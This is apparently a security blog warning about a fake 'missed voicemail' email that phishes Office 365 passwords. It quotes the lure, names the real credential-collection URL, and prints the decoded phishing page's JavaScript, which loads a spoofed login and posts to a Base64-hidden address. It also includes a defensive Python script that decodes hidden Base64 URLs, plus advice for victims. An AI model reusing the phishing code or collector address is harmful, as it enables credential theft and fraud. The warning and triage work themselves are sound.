You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING!!
This message has been seen going out to Office 365 and other clients.
Beware!!! - This email is a phishing trick to get your password for Office 365 and may also contain malware to damage or compromise your computer:
Hello Recipient,
Your caller left you 3 voicemail messages.
Voice - Message for: [email protected] (MISSED CALLS)
CALLER NUMBER : +44 335970973
Please download attachment to listen to Message
Messages will auto delete in 2 hours
As you can see it appears to just record the email address:
The site to which your credentials will be sent appears to be: http://mtu.edu.ng/wp-content/uploads/2020/9/9/h.php, which is encoded with Base64 in the JavaScript code on the site:
Their code site appears to be (or have been) protected by Cloudflare, who really do need to check on their customers a little more closely.
Their HTML code, which was in Base64, then reads:
<html>
  <head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"
      integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="
      crossorigin="anonymous"
    ></script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.8/FileSaver.min.js"
      integrity="sha256-FPJJt8nA+xL4RU6/gsriA8p8xAeLGatoyTjldvQKGdE="
      crossorigin="anonymous"
    ></script>
  </head>
  <body>
    <div id="capture" style="padding: 10px; color: black"></div>
    <script type="text/javascript">
      try {
        var email = atob(e);
      } catch (e) {
        var email = e;
      }
      var domain = e.split("@");
      setTimeout(() => {
        loadPages(
          eur +
            "?e=" +
            e +
            "&ep=" +
            ep +
            "&en=" +
            btoa(e) +
            "&eu=" +
            domain[1]
        );
      }, 2000);
      function loadPages(load) {
        var testURL = load;
        $.ajax({
          url: atob(hp),
          method: "POST",
          data: { url: testURL },
          success: function (response) {
            response = response.replace(/href="\//g, 'href="' + testURL + "/");
            response = response.replace(/src="\//g, 'src="' + testURL + "/");
            response = response.replace(
              /content="\//g,
              'content="' + testURL + "/"
            );
            $("#capture").html(response);
            // console.log(response);
          },
        });
      }
    </script>
  </body>
</html>
This code is designed to impersonate the Office 365 login and send your password to the hackers so that they can use your credentials to compromise you in some way. Often they are looking for email accounts that they can take control of that deal with invoicing etc. so that they can put fake account details in to try and defraud companies or people.
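Because the attachment hides both its page body and its posting address behind Base64 (the `atob(hp)` call above), a reported attachment can be triaged without opening it in a browser by decoding every Base64 string literal it contains. The following is an added example, not code from the phishing kit or from the original post; the sample attachment, the `.example` hosts and the variable name `lure` are constructed for illustration.

```python
import base64
import binascii
import re

# Quoted string literals made only of Base64 characters (16+ before padding).
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
URL = re.compile(r"""https?://[^\s"'<>]+""")


def decode_candidate(token):
    """Return the decoded text if token is Base64 for readable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def hidden_urls(html, max_depth=3):
    """Collect URLs that only appear after Base64-decoding literals in html.
    Decoded text is rescanned, because the page body itself may be wrapped."""
    urls = set()
    layers = [(html, 0)]
    while layers:
        text, depth = layers.pop()
        for token in B64_LITERAL.findall(text):
            decoded = decode_candidate(token)
            if decoded is None:
                continue
            urls.update(URL.findall(decoded))
            if depth + 1 < max_depth:
                layers.append((decoded, depth + 1))
    return sorted(urls)


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample: an inner page whose endpoints are Base64 literals,
# itself Base64-wrapped in the outer attachment (hosts are placeholders).
INNER = '<script>var hp = "%s"; var lure = "%s";</script>' % (
    _b64("https://collector.example/h.php"), _b64("https://login.example/"))
SAMPLE = '<html><script>document.write(atob("%s"))</script></html>' % _b64(INNER)

if __name__ == "__main__":
    for url in hidden_urls(SAMPLE):
        print(url.replace("http", "hxxp", 1))  # defanged for the ticket
```

The decoded addresses can then be checked against proxy and DNS logs to see whether anyone in the organisation reached them.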
If you have ever put your email credentials into a page that suddenly redirects you to somewhere unexpected or to your home Office 365 page when you were being asked for access codes, change your password immediately and check your mail account for mailbox rules that you did not create. Typically they pick one person to try and defraud and then make up rules in your mailbox so that you do not see any replies from that person that may give the game away.
If you suspect you have had your mailbox compromised, contact all your friends or suppliers and warn them to be vigilant.